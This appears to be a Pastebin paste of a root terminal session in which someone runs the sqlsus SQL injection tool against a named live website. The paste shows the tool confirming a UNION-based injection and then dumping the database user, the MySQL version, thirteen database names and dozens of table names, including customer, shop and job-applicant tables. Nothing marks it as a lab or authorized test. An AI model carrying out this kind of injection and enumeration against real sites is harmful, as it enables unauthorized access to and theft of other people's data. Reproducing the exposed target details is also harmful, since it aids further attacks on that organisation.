Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ┌─[root@parrot]─[/home/aj3dx]
- └──╼ #sqlsus -g vuln.conf
- sqlsus version 0.7.2
- Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
- vuln.conf already exists, overwrite ? [y|n] ? y
- [+] Configuration successfully saved to vuln.conf
- ┌─[root@parrot]─[/home/aj3dx]
- └──╼ #nano vuln.conf
- ┌─[root@parrot]─[/home/aj3dx]
- └──╼ #sqlsus vuln.conf
- sqlsus version 0.7.2
- Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)
- [+] Session "eng.sekisat.com" created
- sqlsus> start
- [+] Correct number of columns for UNION : 9 (1,1,1,1,1,1,1,0,0)
- [+] Length restriction on URL : 8199 bytes
- [+] Filling %target...
- +----------+-----------------------------+
- | Variable | Value |
- +----------+-----------------------------+
- | database | SEKIsekisat |
- | user | 'sekisat'@'localhost' |
- | version | 5.5.31-0ubuntu0.12.04.1-log |
- +----------+-----------------------------+
- 3 rows in set
- sqlsus> get database
- Usage : get <item>
- This command retrieves information from MySQL system tables (information_schema.*).
- Note that it will only work on MySQL >= 5. Otherwise, see "brute".
- Possible items :
- tables : get the names of the tables of the current database (as per "set")
- columns [table_name] : get the names of the columns [for the given table]
- count [table_name] : get the count(*) for each table [or the given table]
- db : same as get tables + columns + count
- privs : get the privileges for the user
- databases : get the names of all the databases
- sqlsus> get databases
- [+] Getting databases names
- +---------------+
- | Databases |
- +---------------+
- | SEKIsekisat |
- | SEKIBBS |
- | SEKIWooJin |
- | SEKIcounter |
- | SEKIcustomer |
- | SEKIgnu4 |
- | SEKIip_class |
- | SEKIiskylife |
- | SEKIproduct |
- | SEKIsatellite |
- | SEKIshop |
- | SEKIstock |
- | SEKIzipcode |
- +---------------+
- 13 rows in set
- sqlsus> get tables
- [+] Getting tables names
- <( SEKIsekisat )>
- [basket]
- [board_benchmark]
- [board_category]
- [board_comment]
- [board_digital]
- [board_forum_eng]
- [board_free_broadcasting]
- [board_group]
- [board_pds]
- [board_pds_eng]
- [board_satellite_index]
- [board_satellite_pds]
- [board_service]
- [board_service_eng]
- [board_service_secret]
- [board_setup]
- [company]
- [company22]
- [company_category]
- [company_category22]
- [construction_history]
- [counter_200705]
- [counter_200708]
- [counter_200710]
- [counter_200711]
- [counter_200901]
- [counter_pageview_200704]
- [counter_pageview_200705]
- [counter_pageview_200707]
- [counter_pageview_200708]
- [counter_pageview_200710]
- [counter_pageview_200711]
- [counter_pageview_200712]
- [counter_pageview_200802]
- [counter_pageview_200804]
- [counter_pageview_200805]
- [counter_pageview_200806]
- [counter_pageview_200809]
- [counter_pageview_200901]
- [counter_pageview_200908]
- [employ_applicant]
- [employ_notice]
- [fieldselectdefine]
- [focus]
- [gallery_installation_photo_eng]
- [gallery_satellite]
- [gallery_satellite_photo_eng]
- [gallery_sky_satellite]
- [gallery_user_photo_eng]
- [gallery_user_satellite]
- [package]
- [sat_channel]
- [sat_channel_category]
- [sat_channel_set]
- [sat_channel_set_change]
- [sat_language_category]
- [sat_products]
- [sat_relay]
- [sat_relay_change]
- [sat_satellite]
- [sat_state_category]
- [satellite_photo]
- [service_news]
- [service_news_eng]
- [service_notice]
- [service_notice_eng]
- [service_user_market]
- [service_user_market_comment]
- [sky_satellite_photo]
Advertisement
Add Comment
Please, Sign In to add comment